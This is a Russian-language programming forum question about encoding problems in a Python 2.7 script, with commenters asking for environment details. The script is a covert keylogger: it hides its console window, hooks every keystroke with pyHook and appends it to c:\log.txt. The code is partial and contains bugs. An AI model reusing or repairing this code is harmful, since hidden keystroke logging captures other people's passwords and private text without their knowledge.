# python знаки вопроса вместо букв

Tags: python, кодировка

добрый день,
программка на python,

```
import win32api
import win32console
import win32gui

import pythoncom, pyHook

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

def OnKeyboardEvent(event):
if event.Ascii==5:
    _exit(1)

if event.Ascii != 0 or 8:
    f=open('c:\log.txt','r')
    buffer=f.read()
    f.close()
    f=open('c:\log.txt','w')
    keylogs=chr(event.Ascii)
    if event.Ascii==13:
        keylogs='/n'
    buffer += keylogs
    f.write(buffer)
    f.close()
```

при записи в файл нажатия кнопок клавиатуры,c цифрами и скобками всё ок, но вместо букв получаю знаки вопроса и иногда спецсимволы, под одной системой программа работает нормально(win 7 32 разряда) под 64 пишет спецсимволы, с неясной кодировкой:

[image: введите сюда описание изображения]
подскажите как решить этот вопрос?
**update1**:
1)можно ли как-то разобрать иероглифы, уже сохраненные?
2)как избежать такой свистопляски с кодировкой?
pyHook 1.5.1

Comment: Какая версия Python? Используете pyHook?

Comment: 2.7.9, pyHook использую

Comment: Здесь всё очень сильно зависит от окружения. Создайте **минимальный**, но *самодостаточный* пример кода, который демонстрирует проблему и подробно опишите: ОСь, консолька (cmd или PowerShell), какой шрифт, кодировка в консольке (OEM), кодировка в Винде (ANSI), версия Питона, версии, используемых внешних библиотек (таких как pyHook),  точная команда как запускается скрипт.